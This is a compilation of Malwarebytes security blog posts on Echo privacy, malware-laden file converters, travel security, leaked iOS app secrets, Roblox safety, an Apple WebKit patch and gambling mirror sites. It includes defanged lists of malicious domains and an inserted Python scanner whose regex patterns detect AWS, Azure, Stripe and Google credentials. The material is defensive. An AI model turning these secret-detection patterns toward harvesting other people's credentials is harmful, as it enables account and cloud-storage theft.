Malwarebytes
Amazon disables privacy option, will send your Echo voice recordings to the cloud
Amazon has announced its Echo devices will no longer have the option to store and process requests on the device itself, meaning your voice recordings will now be sent to the cloud for processing.
In an email sent to customers, Amazon explained that the feature “Do Not Send Voice Recordings” will no longer be available beginning March 28, 2025.
The reason for this change? AI.
“As we continue to expand Alexa’s capabilities with generative AI features that rely on the processing power of Amazon’s secure cloud, we have decided to no longer support this feature.”
Basically, requests that rely on AI features can’t be processed within the limited processing power of the Echo device itself. This means that voice recordings will be sent to and processed in the cloud.
Amazon promises the recordings will be deleted after Alexa processes your requests if you enable the “Don’t Save Recordings” setting (we recommend you do this). But is that promise enough? And what happens to the data before it’s deleted? After all, it wasn’t that long ago that Amazon’s Ring camera feeds were available for all staff and contractors to view.
This change confirms existing fears about user privacy with the implementation of the generative AI version of Alexa. Due to the financial losses that came with Alexa’s operation, Amazon introduced the AI-powered Alexa+, which has far more capabilities and should generate more cash flow. Alexa+ is based on several major language models, such as Amazon’s in-house Nova models and Claude from Anthropic.
In a statement Amazon told TechCrunch:
“The Alexa experience is designed to protect our customers’ privacy and keep their data secure, and that’s not changing. We’re focusing on the privacy tools and controls that our customers use most and work well with generative AI experiences that rely on the processing power of Amazon’s secure cloud.”
This sounds reassuring, but something that doesn’t leave the device can’t get lost along the way. So, the “Do Not Send Voice Recordings” option sounds a lot safer to me.
Reportedly, the change specifically affects the Echo Dot (4th Gen), Echo Show 10, and Echo Show 15 devices, for customers in the US with devices set to English.
When devices are too smart
I love gadgets as much as the next person, but with some devices I wonder whether it’s really necessary to make them “smart.”
The only way to protect your privacy and security at home is to avoid using devices that connect to the internet, including your phone. Obviously, in today’s world, that’s an impossible task for most. Therefore, the second-best option is to consider which devices are absolutely necessary for work, pleasure, and convenience, and slim down the list of smart-enabled devices.
For example, for an energy-conscious person, the use of a smart thermostat makes sense. However, we’ve seen plenty of devices that were only smart because it benefited the vendor. Data brokers will pay a pretty penny to those vendors if you install their app which gathers data about you and your device.
Warning over free online file converters that actually install malware
The FBI Denver Field Office has warned of an increasing number of scammy websites offering free online file converter services.
Instead of converting files, the tools actually load malware onto victims’ computers. The FBI warned specifically about that malware leading to ransomware attacks, but we’ve also seen similar sites that install browser hijackers, adware, and potentially unwanted programs (PUPs).
The cybercriminals offer any kind of popular file conversion to attract victims, with the most common ones converting .doc to .pdf files and vice versa. There are also sites that offer to combine multiple images into one .pdf file.
And it’s not as if these file converters don’t work. Usually, they will, and the victim will think nothing more of it. They might even recommend it to a friend or co-worker.
But in the background, the file the victim downloaded carries hidden malware, which is capable of gathering information from the affected device such as:
- Personal identifying information (PII) including Social Security Numbers (SSN).
- Financial information, like your banking credentials and crypto wallets.
- Other passwords and session tokens that could allow the scammers to bypass multi-factor authentication (MFA).
- Email addresses.
There are a few possible scenarios the cybercriminals might pursue:
- They encourage you to download a tool on your device to do the conversion. This is the actual malware.
- You might be advised to install a browser extension that you can use going forward. These extensions are often browser hijackers and adware.
- In the most sophisticated scenario, the so-called converted file contains malware code that downloads and installs an information stealer, and everyone who opens it will get their device infected.
By using one of these online converters you could be at risk of getting infected with ransomware, or of enabling criminals to steal your data or your identity in full.
Education is key
FBI Denver Special Agent in Charge Mark Michalek stated:
“The best way to thwart these fraudsters is to educate people so they don’t fall victim to these fraudsters in the first place.”
Obviously it also helps to have active anti-malware protection on your device and a browser extension that blocks malicious sites.
If you have fallen victim, or suspect you may have, you should:
- Contact your financial institutions immediately. Work with them to take the necessary steps to protect your identity and your accounts.
- Change all your passwords and do this using a clean, trusted device.
- Report it to the Internet Crime Complaint Center.
Below are some recent examples of domains involved in this type of scam and the reason why Malwarebytes products block them.
imageconvertors[.]com (Phishing)
convertitoremp3[.]it (Riskware)
convertisseurs-pdf[.]com (Riskware)
convertscloud[.]com (Phishing)
convertix-api[.]xyz (Trojan)
convertallfiles[.]com (Adware)
freejpgtopdfconverter[.]com (Riskware)
primeconvertapp[.]com (Riskware)
9convert[.]com (Riskware)
convertpro[.]org (Riskware)
We don’t just report on threats – we help safeguard your entire digital identity
Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.
1 in 10 people do nothing to stay secure and private on vacation
This year, Spring Break vacationers are packing more than their flip-flops, bucket hats, and sunglasses—they’re also packing a few cybersecurity anxieties for the trip.
According to new research from Malwarebytes, 52% of people said they “worry about being scammed while traveling,” while another 40% admitted that they “worry about my kids or family sharing trip details online.” While most people said they will act on these concerns—63% will make sure their security software is up to date, 53% will back up their data—roughly 10% of people said they will take no precautions whatsoever to protect their security or privacy while on vacation.
The findings reveal that the public approaches cybersecurity as a patchwork quilt, implementing some best practices while forgoing others, and engaging in a few behaviors that carry significant risk online.
For this research, Malwarebytes conducted a pulse survey of its customers in March via the Alchemer Survey Platform.
Broadly, Malwarebytes found that:
- 52% of people “agreed” or “strongly agreed” that they “worry about being scammed while traveling.”
- 20% of people “agreed” or “strongly agreed” that they “don’t really think about protecting my data while traveling.”
- 38% of people said they will book their next travel opportunity through a “general search,” which could leave them vulnerable to malvertising.
- Apps are a way of life, as 66% of people said they use between one and six apps specifically for travel (such as hotel apps, airline apps, and translation apps). A particularly plugged-in 8% of people said they manage more than seven apps for the same purposes.
- To stay cybersecure and private on vacation, the majority of people will back up their data (53%), ensure their security software is up to date (63%), and set up credit card transaction alerts (56%), but 10% will take none of these—or other—steps.
- 53% of people refuse to take a single laptop with them on vacation, whereas just 1% leave even their smartphone behind—talk about a holiday.
The cybersecurity risks around personal vacations are unlike those around the holidays for major organizations and businesses, in which cybercriminals know that low staffing will leave companies more vulnerable to an attack or breach.
Instead, far-flung Spring Breakers can engage in a series of behaviors both before and during their holidays that leave them open to online scams and theft.
Take, for example, the 38% of people who told Malwarebytes that they would conduct a “general search online” in booking their next vacation. While Google searches are probably one of the most common tasks for any vacation planning, the results that people see can be manipulated through a type of cybercrime called malvertising, short for “malicious advertising.”
In malvertising, cybercriminals will create a fake website that looks like a popular service, like Facebook, Slack, or eBay. Cybercriminals will also pay a small sum so that these fake websites show up near the top of Google’s sponsored results for relevant searches. Once users click on the websites, which appear legitimate, they’re tricked into downloading malware or handing over sensitive information to scammers.
A safer option for vacationers is to book travel directly with an airline or hotel chain. Many participants wrote this approach into the Malwarebytes survey when selecting the “Other” option (14%). Interestingly, the 29% of respondents who said they use a travel agent for booking likely also receive some extra safeguards, simply because another, experienced, person is involved in the process.
But in the same way that cybercriminals have begun abusing Google search results to send victims to dangerous websites, they’ve also done the same to trick users into downloading fake versions of popular apps.
Android “phishing” apps are a serious threat to users today—Malwarebytes detected 22,800 of them last year alone—and, as we wrote before, they represent the next step in camouflaged cyber-scamming:
“By disguising themselves as legitimate apps—including for services like TikTok, Spotify, and WhatsApp—Android phishing apps can trick victims into typing in their real usernames and passwords on bogus login screens that are controlled entirely by cybercriminals.”
The threat here endures long after the app is installed. If enough victims unwittingly send their passwords, cyber thieves could bundle the login credentials for sale on the dark web. Once the passwords are sold, the new, malicious owners will attempt to use individual passwords for a variety of common online accounts—testing whether, say, an email account password is the same one used for a victim’s online banking system, their mortgage payment platform, or their Social Security portal.
This wouldn’t be too much of a problem if modern traveling didn’t involve so many apps.
According to our survey, 44% of people manage between two and four apps specifically for travel purposes, and 9% manage between five and six apps. And while 20% of people use zero apps for travel and 14% use just one app, there are 8% of people who rely on more than seven apps strictly for travel purposes.
That could include airline apps, hotel apps, translation apps, and more. But as more apps help with traveling needs, more opportunities arise for those apps to be falsely emulated and maliciously advertised online.
As for what people do while physically on vacation, many engaged in online behaviors that could prove risky, but they can hardly be criticized for it.
For example, 25% of people said they scan QR codes while on vacation. These codes could lead people to malicious websites, but QR codes have become normalized at restaurants that no longer have physical menus. And 33% of people “log into financial institution sites or apps to manage [their] budget, check purchases, etc.” This type of activity was susceptible to online eavesdropping many years ago, but everyday internet connections have become far more secure in the past decade. That said, it’s inspiring to see that 41% of people “download or install a VPN” to provide an extra level of security when browsing on public Wi-Fi.
Safe travels
Cybersecurity is probably the last thing people want to “pack” before going away on a break, but, thankfully, it’s something that a majority of people said they do.
For instance, 63% said they “check that [their] security software is up to date,” while 53% said they “back up [their] data.” Similarly, 56% said they “set up credit card transaction alerts.” And while it isn’t quite a majority, 47% said they turn on “Find my Device” features, which can help in case of a lost or stolen device. Interestingly, people do not commit to the same precautions for their bags—just 21% of survey participants said they “put a tracker in [their] luggage.”
Still, there’s progress to be made.
Not only did 10% of survey participants share that they take zero cybersecurity or data privacy precautions before traveling, but 20% also agreed or strongly agreed with the statement “I don’t really think about protecting my data while traveling.”
For safety abroad, here are a few tips travelers can take before and during their next vacation:
- Back up your data before you head out. Losing a device or having it stolen while on vacation won’t just ruin the trip itself—it will ruin the return journey, too. Backing up your data will help ensure that any lost device doesn’t lead to lost files.
- Turn on “Find My” features. To respond to a lost or stolen device, turn on the “Find My” features on iPhones and Androids before your vacation so you can track a device’s location in real time.
- Protect your devices with antivirus and cybersecurity tools. Modern cybersecurity tools don’t just stop viruses from landing on your devices, they also warn you about dangerous websites and links that could steal your info.
- Update your software. Ensure that your devices are running on the latest versions of their operating systems. This helps prevent any known weaknesses from being exploited by cybercriminals.
- Use a password manager and 2FA. Your most sensitive accounts shouldn’t just have a unique password. They should also be protected by two-factor authentication, which requires more than a password for anyone to log in.
- Consider a VPN. If you are doing something sensitive online, it never hurts to use a VPN. Bonus: If you’re travelling to another country where your favourite streaming shows aren’t available, a VPN can help here too.
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
A week in security (March 10 – March 16)
Last week on Malwarebytes Labs:
- Research on iOS apps shows widespread exposure of secrets
- Don’t let your kids on Roblox if you’re not comfortable, says Roblox CEO
- Update your iPhone now: Apple patches vulnerability used in “extremely sophisticated attacks”
- The dark side of sports betting: How mirror sites help gambling scams thrive
- Android devices track you before you even sign in
- X users report login troubles as Dark Storm claims cyberattack
- How ads weirdly know your screen brightness, headphone jack use, and location, with Tim Shott (Lock and Code S06E05)
- Fake CAPTCHA websites hijack your clipboard to install information stealers
- Malwarebytes Premium Security awarded “Product of the Year” from AVLab
Last week on ThreatDown:
- ThreatDown is Product of The Year
- March 2025 Patch Tuesday, severity over quantity
- Phishing, now available on your favorite app store!
Stay safe!
Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.
Research on iOS apps shows widespread exposure of secrets
Researchers found that most of the apps available on Apple’s App Store leak at least one hard-coded secret.
The researchers looked at 156,000 iOS apps and discovered more than 815,000 hard-coded secrets, including very sensitive secrets like keys to cloud storage, various Application Programming Interfaces (APIs), and even payment processors.
The researchers noted how:
“The average app’s code exposes 5.2 secrets, and 71% of apps leak at least one secret.”
Secrets hard-coded in the source code of the apps are considered exposed because they are relatively easy to find and abuse by cybercriminals.
While you may think that’s the publisher’s problem, these hard-coded secrets can have serious consequences for an app’s users, particularly when they are credentials which provide access to cloud storage services like AWS S3 buckets or Azure Blob Storage. The researchers found 78,000 apps which exposed cloud storage buckets.
We have posted plenty of examples of exposed AWS S3 buckets over the years, often leading to millions of exposed customer records. Depending on the type of app these records can contain financial data, location data, and other personal information.
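One way to check your own build for the kind of hard-coded credentials the researchers describe, as an added example that is not part of the original post or of the cited research: a small scanner to run over source files, plist/JSON resources, or the output of `strings` on a compiled binary. The vendor prefixes (AKIA, sk_live_, AIza, AccountKey=) are the vendors’ documented formats; the length limits, the entropy threshold and the sample input are assumptions, and the sample input is constructed (the AWS value is the documented AWS example key, not a real credential).

```python
"""Hard-coded secret scanner for text extracted from an app bundle (added example)."""
from __future__ import annotations

import math
import re
import string
from collections import Counter
from dataclasses import dataclass

# Provider-specific formats: a match is reported regardless of entropy.
# Prefixes are documented by the vendors; the exact lengths are assumptions to tune.
PROVIDER_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "azure_storage_account_key": re.compile(r"AccountKey=([A-Za-z0-9+/]{86}==)"),
    "stripe_live_secret_key": re.compile(r"\bsk_live_[0-9a-zA-Z]{24,}\b"),
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z_\-]{35}\b"),
}

# Generic "keyword = 'value'" assignments: reported only when the value looks
# random enough (Shannon entropy), which drops placeholders such as REPLACE_ME.
GENERIC_PATTERN = re.compile(
    r'''(?i)(?:key|secret|token|passw(?:or)?d)\w*\W{0,5}["']([A-Za-z0-9_\-/+=]{20,})["']'''
)
GENERIC_ENTROPY_THRESHOLD = 3.5  # bits per character; assumption, tune per code base


@dataclass(frozen=True)
class Finding:
    kind: str
    line_no: int
    redacted: str   # never log the full secret
    entropy: float


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for an empty string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def redact(value: str) -> str:
    """Keep just enough of the value to locate it in the code base."""
    if len(value) <= 8:
        return "*" * len(value)
    return f"{value[:4]}...{value[-2:]} ({len(value)} chars)"


def scan_text(text: str) -> list[Finding]:
    """Scan text line by line; returns one Finding per distinct secret value per line."""
    findings: list[Finding] = []
    seen: set[tuple[int, str]] = set()
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PROVIDER_PATTERNS.items():
            for m in pattern.finditer(line):
                value = m.group(1) if m.groups() else m.group(0)
                if (line_no, value) not in seen:
                    seen.add((line_no, value))
                    findings.append(Finding(kind, line_no, redact(value), round(shannon_entropy(value), 2)))
        for m in GENERIC_PATTERN.finditer(line):
            value = m.group(1)
            ent = shannon_entropy(value)
            if (line_no, value) not in seen and ent >= GENERIC_ENTROPY_THRESHOLD:
                seen.add((line_no, value))
                findings.append(Finding("generic_high_entropy_secret", line_no, redact(value), round(ent, 2)))
    return findings


# Constructed sample: what `strings` might return for a fictional app binary.
# The Azure value is a synthetic 88-character base64 string, not a real key.
FAKE_AZURE_KEY = string.ascii_lowercase + string.ascii_uppercase + string.digits + "+/" + string.ascii_lowercase[:22] + "=="
SAMPLE_STRINGS = f"""\
// constructed sample: strings pulled from a fictional app bundle
static NSString *const kBucketRegion = @"us-east-1";
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
DefaultEndpointsProtocol=https;AccountName=fakeacct;AccountKey={FAKE_AZURE_KEY}
API_KEY = "REPLACE_ME_REPLACE_ME_1"
payments_token = "q7Xp2vL9mR4tW8kZ1nB6yC3"
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE_STRINGS):
        print(f"line {f.line_no}: {f.kind} {f.redacted} entropy={f.entropy}")
```

The placeholder on line 5 of the sample is skipped by the entropy gate, while the provider-format matches are reported even when their entropy is modest.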
Unless you’re able to reverse engineer an app, there is not a lot you can do after the fact. But you can keep this information in mind before you install an app. Do you trust the developers to follow best practices and do you really need it? Also keep a tight rein on the permissions you allow an app.
Protecting yourself after a data breach
There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.
- Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
- Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
- Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
- Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
- Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
- Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
- Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.
If you want to find out what personal data of yours has been exposed online, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.
Don’t let your kids on Roblox if you’re not comfortable, says Roblox CEO
In response to growing worries about the safety of children using Roblox, the CEO of the company has said to parents: “My first message would be, if you’re not comfortable, don’t let your kids be on Roblox.”
Roblox is one of the most popular gaming platforms, especially among young children. Reportedly, of the over 80 million players per day, roughly 40% of them are below the age of 13.
As we wrote last month, a lawsuit was recently initiated against Roblox and messaging platform Discord, in which Roblox was referred to as a “real-life nightmare for children.”
Besides spending way too much time on the platform, children run the risk of getting exposed to inappropriate content, online predators, cyberbullying, and scams. Scammers often promise free Robux (the virtual currency used on the platform) or other benefits to trick children into sharing personal information or downloading malware.
The lawsuit claims that both Roblox and Discord are aware of how easily predators can target children through their platforms by grooming and manipulating children into sending explicit material but have failed to provide adequate safety measures to protect minors from such exploitation.
Asked about the allegations, co-founder and CEO of Roblox, Dave Baszucki said the company is vigilant in protecting its users and pointed out that tens of millions of people enjoy an amazing experience on the platform.
“We watch for bullying, we watch for harassment, we filter all of those kinds of things, and I would say behind the scenes, the analysis goes on all the way to, if necessary, reaching out to law enforcement.”
But to parents who are still worried, he told the BBC that these caretakers should trust their instincts, make their own decisions, and not let their kids be on Roblox.
Which, if you have kids, you will recognize as something “easier said than done.”
How can you keep your children safe?
Since it’s not likely you’ll be able to guide your children 24/7 in their online journey, here are some tips you can use to keep them safe.
- Take control. Use Roblox’s Parental Controls to limit access to age-appropriate games and content and enable features like daily screen-time limits.
- Anonymize. When setting up your child’s Roblox account, avoid using real names, and use an appropriate date of birth to enable the relevant restrictions.
- Friend requests. Access the settings of your child’s account to limit or disable friend requests and online chat capabilities.
- Stay on the platform. Tell your child to refuse requests to take chats offline or to another platform. Predators will do this to avoid Roblox’s restrictions about sharing images.
- Education. Teach children about online safety, including not sharing personal information and avoiding suspicious links, and make sure they are comfortable sharing their online experiences with you.
- Play with them. What’s more fun than beating your parents in your favorite game? Spending some quality time with them makes it fun to keep an eye on them and the games they enjoy.
- Information. Stay on top of information about Roblox’s updates, features, and changes.
- Protect the device. Make sure they are playing on a device that is fully up-to-date and actively protected.
Update your iPhone now: Apple patches vulnerability used in “extremely sophisticated attacks”
Apple has patched a vulnerability in iPhone and iPad that was under active exploitation by cybercriminals.
The update is available for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later.
If you use any of these then you should install updates as soon as you can. To check if you’re using the latest software version, go to Settings (or System Settings) > General > Software Update. It’s also worth turning on Automatic Updates if you haven’t already, which you can do on the same screen.
Overall, security updates were issued for:
- Safari 18.3.1: macOS Ventura and macOS Sonoma
- iOS 18.3.2 and iPadOS 18.3.2: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later
- macOS Sequoia 15.3.2: macOS Sequoia
- visionOS 2.3.2: Apple Vision Pro
If you use Malwarebytes for iOS, you can use the app to check if you need to update, and be guided through the update process.
Technical details
WebKit is the browser engine developed by Apple that helps display web content in applications. It allows apps to show web pages without the need for a full web browser. WebKit is used in many Apple products, such as Safari, Mail, and the App Store, as well as in other devices like PlayStation consoles and Amazon Kindle e-readers.
The actively exploited vulnerability is tracked as CVE-2025-24201.
“An out-of-bounds write issue was addressed with improved checks to prevent unauthorized actions. This issue is fixed in visionOS 2.3.2, iOS 18.3.2 and iPadOS 18.3.2, macOS Sequoia 15.3.2, Safari 18.3.1. Maliciously crafted web content may be able to break out of Web Content sandbox. This is a supplementary fix for an attack that was blocked in iOS 17.2. (Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 17.2.).”
Simply put, that means an attacker could send a target a link, or lure them to open a web page, that triggers an out-of-bounds write in memory allocated for WebKit. That memory corruption would then enable the attacker to escape from the Web Content sandbox, which is a security feature used in web browsers to isolate web content, such as web pages and scripts, from the rest of the system. It’s designed to stop malicious code from accessing sensitive system resources or user data outside of the browser.
About a month ago, we reported how Apple fixed another extremely sophisticated attack that was used against targeted individuals. This one is much more likely to be used against more users, so you should prioritise updating your phone as soon as you can.
We don’t just report on phone security—we provide it
Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.
The dark side of sports betting: How mirror sites help gambling scams thrive
Sports betting is a multi-billion-dollar industry, but behind the flashing lights and promises of easy money lies a hidden underworld of deception.
In recent years, shady betting companies have found a clever way to bypass regulations and continue their operations through mirror sites—duplicate versions of their main website that allow them to evade bans, deceive users, and rake in massive profits.
How gambling companies exploit mirror domains
A mirror site is essentially a clone of an existing betting website, hosted on a different domain. Companies create dozens – sometimes even hundreds – of these mirrors to ensure they remain accessible even when regulators try to shut them down.
Why do they do this?
- Evade regulation: Governments and gambling commissions regularly block illegal or unlicensed betting sites. When one gets banned, the company simply redirects users to a new domain.
- SEO and ad manipulation: More domains mean more search engine presence, allowing these companies to dominate the online gambling market and attract unsuspecting bettors.
- Affiliate and referral loopholes: Many of these sites exist solely to capture affiliate commissions, misleading users into thinking they are signing up through legitimate sources.
- Phishing and fraud risks: Users might unknowingly enter personal and financial details on a fake version of the site, opening themselves up to scams and identity theft.
One of the most infamous cases of gambling companies using mirror domains is 1xBet, a company that built an empire by aggressively bypassing laws through hundreds of duplicate sites.
1xBet’s tactics were so successful that they made millions in revenue, eventually becoming a global sponsor of FC Barcelona. But despite their rise to legitimacy, their past was riddled with controversy:
- They were banned in Russia but continued to operate through mirror sites.
- The UK Gambling Commission launched an investigation into their illegal activities, forcing them to suspend operations in the UK.
- Reports surfaced that they hosted illegal casino games and even betting on cockfighting.
Even after being blacklisted in multiple countries, they continued to thrive simply by shifting users to a new domain each time one was blocked.
20Bet and MostBet’s expanding mirror network
But 1xBet isn’t alone. Recent investigations have revealed that newer betting companies are using the same shady tactics.
- 20Bet has over 100 active domains, many of which are identical mirrors/referrals of each other.
- MostBet has over 40 mirror sites, ensuring that they can never be completely shut down.
This extensive network allows them to:
- Dodge regulatory action and continue operating in countries where they are banned.
- Flood search engines and ad networks, making it difficult for users to distinguish legitimate operators from scams.
- Run deceptive marketing campaigns, promising risk-free bets and bonuses that are often impossible to claim.
Imagine this scenario: A football fan eager to bet on an upcoming match searches for a reliable betting site. They click on a paid ad for 20Bet, promising a “100% Risk-Free Bet Up to $500.”
- They sign up and deposit money on what appears to be the official site.
- They win their first bet and try to withdraw—but the site suddenly disappears.
- They find another 20Bet domain and try logging in—only to realize their credentials don’t work. They’ve been scammed.
Because so many duplicate domains exist, it’s nearly impossible for users to track where their money is actually going – or whether the site they’re on is real at all.
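The “dozens of different URLs” red flag can be checked mechanically: the script below groups defanged domain indicators by brand, so a mirror network shows up as one large cluster rather than as unrelated domains. It is an added example, not part of the original post; the indicator list is constructed in the post’s `[.]` style (the `.example` names are reserved documentation domains), and the suffix table, the edit-distance tolerance and the cluster threshold are assumptions (a real tool would use the Public Suffix List).

```python
"""Cluster defanged domain indicators by brand to surface mirror networks (added example)."""
from __future__ import annotations

import re
from collections import defaultdict

# Multi-label public suffixes handled by this demo; everything else is treated as a
# single-label TLD. Assumption: good enough for the sample, not for production use.
MULTI_LABEL_SUFFIXES = {"co.uk", "co.nz", "com.br", "com.au"}


def refang(indicator: str) -> str:
    """Turn 'example[.]com' or 'hxxp://example(.)com/path' back into a plain hostname."""
    host = indicator.strip().lower().replace("[.]", ".").replace("(.)", ".")
    host = re.sub(r"^hxxps?://", "", host)
    return host.split("/")[0]


def registrable_domain(host: str) -> str:
    """Drop subdomains such as 'ww2.' so several mirrors on one domain count once."""
    labels = host.split(".")
    suffix_len = 2 if ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES else 1
    return ".".join(labels[-(suffix_len + 1):])


def core_label(registrable: str) -> str:
    """The brand-bearing label with hyphens removed: '20-bet.example' -> '20bet'."""
    return registrable.split(".")[0].replace("-", "")


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch near-spellings like '20bett' or '20beta'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def match_brand(core: str, brands: list[str], max_distance: int = 1) -> str | None:
    """Return the brand a label belongs to: substring match, or within edit distance."""
    for brand in brands:
        if brand in core or levenshtein(core, brand) <= max_distance:
            return brand
    return None


def cluster_mirrors(indicators: list[str], brands: list[str], min_cluster: int = 3) -> dict[str, list[str]]:
    """Map brand -> sorted registrable domains, keeping clusters of min_cluster or more."""
    clusters: dict[str, set[str]] = defaultdict(set)
    for ind in indicators:
        reg = registrable_domain(refang(ind))
        brand = match_brand(core_label(reg), brands)
        if brand:
            clusters[brand].add(reg)
    return {b: sorted(d) for b, d in clusters.items() if len(d) >= min_cluster}


# Constructed indicators in the post's defanged style; none of these are real IOCs.
SAMPLE_INDICATORS = [
    "20bet[.]example", "20-bet[.]example", "20bet-login[.]co[.]uk",
    "20bett[.]net", "20betmirror[.]example", "20beta[.]org",
    "mostbet-in99[.]example", "ww2[.]mostbet-mirror7[.]example",
    "ww3[.]mostbet-mirror7[.]example", "mostbetnow[.]co[.]nz",
    "mstwinscasino[.]example", "fair-sportsbook[.]example",
]

if __name__ == "__main__":
    for brand, domains in cluster_mirrors(SAMPLE_INDICATORS, ["20bet", "mostbet"]).items():
        print(f"{brand}: {len(domains)} registrable domains -> {', '.join(domains)}")
```

Domains that share nothing recognisable with a brand (the two unrelated names in the sample) are left out, so the method under-counts rather than over-counts a mirror network.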
How to protect yourself from betting scams
With the rise of mirror sites, it’s more important than ever to be cautious when engaging in online sports betting. Here are some tips to stay safe:
- Check for proper licensing: Legitimate betting companies should be licensed by recognized authorities like the UK Gambling Commission or Malta Gaming Authority.
- Avoid too-good-to-be-true promotions: If a site is offering unrealistic bonuses or “guaranteed” wins, it’s likely a scam.
- Use trusted sources for links: Don’t click on ads or promotional links. Instead, visit the official websites of reputable gambling regulators.
- Be wary of multiple domains: If a betting company has dozens of different URLs, it’s a major red flag.
- Research before depositing: Look up reviews and complaints from other users before signing up for any site.
The sports betting industry continues to grow, but its darker side remains hidden beneath layers of deception. Companies like 1xBet, 20Bet, and MostBet have found ways to outmanoeuvre regulators and keep the money flowing—often at the expense of unsuspecting bettors.
The fact that one of the world’s most controversial gambling companies (1xBet) went from running mirror sites to sponsoring FC Barcelona should serve as a wake-up call. These companies are not just skirting the law – they are thriving because of it.
Until regulators find a way to effectively combat these tactics, sports bettors must remain vigilant. If something seems off, it probably is. And in the world of online gambling, a single wrong move could mean the difference between a big win and losing everything.
IOCs
2d593xv[.]com
3p4hdpmb[.]com
3z9sbhba58mst[.]com
4jls7l19[.]com
4rayasmb[.]com
560rp67[.]com
6q4mhfo[.]com
7tr85sq[.]com
9389z7h[.]com
9mnekb9[.]com
ad2s0rs[.]com
casinomstwins[.]com
cdwxjlz[.]com
jtw2fgmb[.]com
llhrd3wu6vmb[.]com
mfviz8eunkmb[.]com
mkvw5jomb[.]com
mostbet-in33[.]com
mostbet-in34[.]com
mostbet-in36[.]com
mostbet-in37[.]com
mostbet-in46[.]com
mostbet-in56[.]com
mostbet-in62[.]com
mostbethu1[.]com
mostbetru-44[.]com
nfc5wbnalsmb[.]com
ozvfgemb[.]com
rw7e3v5gsumb[.]com
sdma8tw[.]com
sez67b24o7mb[.]com
siosckmb[.]com
sj13ywp[.]com
szakt9s[.]com
tqmdpkthxengz3g1[.]com
v2izr0q9drmb[.]com
vb7awyus6kmb[.]com
w53hy6afrpmb[.]com
winnerzonecasino[.]com
ww16[.]mostbetru-44[.]com
ww38[.]mostbetru-44[.]com
x2cy2g8[.]com
y16uyxu[.]com
y2iqdt2[.]com
ze59byq[.]com
20Bet –
20-bet[.]ar
20-bet[.]at
20-bet[.]ca
20-bet[.]cz
20-bet[.]es
20-bet[.]in
20-bet[.]org
20-bet[.]pt
20-betbet[.]com
20-winbet[.]com
20bet-bet[.]com
20bet-bg[.]com
20bet-br[.]com
20bet-casino[.]org
20bet-co[.]org
20bet-dk[.]org
20bet-dk[.]site
20bet-es[.]com
20bet-fi[.]org
20bet-hr[.]org
20bet-hu[.]org
20bet-italia[.]com
20bet-jp[.]com
20bet-portuguese[.]com
20bet-s[.]com
20bet-win[.]com
20bet[.]asia
20bet[.]be
20bet[.]ch
20bet[.]cl
20bet[.]co[.]nz
20bet[.]com
20bet[.]com[.]de
20bet[.]com[.]in
20bet[.]com[.]pl
20bet[.]com[.]se
20bet[.]hu
20bet[.]icu
20bet[.]life
20bet[.]me
20bet[.]nz
20bet[.]org[.]in
20bet[.]vip
20bet[.]win
20bet1[.]com
20bet1[.]net
20bet1[.]org
20bet2[.]com
20bet3[.]com
20bet4[.]com
20bet5[.]com
20beta[.]com
20betapk[.]com
20betapp[.]com
20betb[.]com
20betbet[.]com
20betbr[.]com[.]br
20betbrasil[.]com
20betcasino[.]lat
20betcasino[.]mx
20betcasino[.]net
20betcasino[.]si
20betcasinoromania[.]org
20betcasinos[.]net
20betcassino[.]com
20betentrar[.]com
20betforum[.]com
20betgame[.]net
20betkasyno[.]pl
20betlogin[.]it
20betluck[.]com
20betlucks[.]com
20betmirror[.]com
20beto[.]com
20betpartners[.]com
20betportugues[.]com
20bets[.]cc
20bets[.]com[.]br
20bets[.]in
20bets[.]org
20bets[.]pe
20bets[.]pl
20betsite[.]com
20bett[.]com
20bett[.]org
20bettin[.]com
20betting[.]com
20betzone[.]com
20bplay[.]com
20bwin[.]com
20bwin[.]pt
20bwins[.]com
20glob[.]com
20luckbet[.]com
20media[.]world
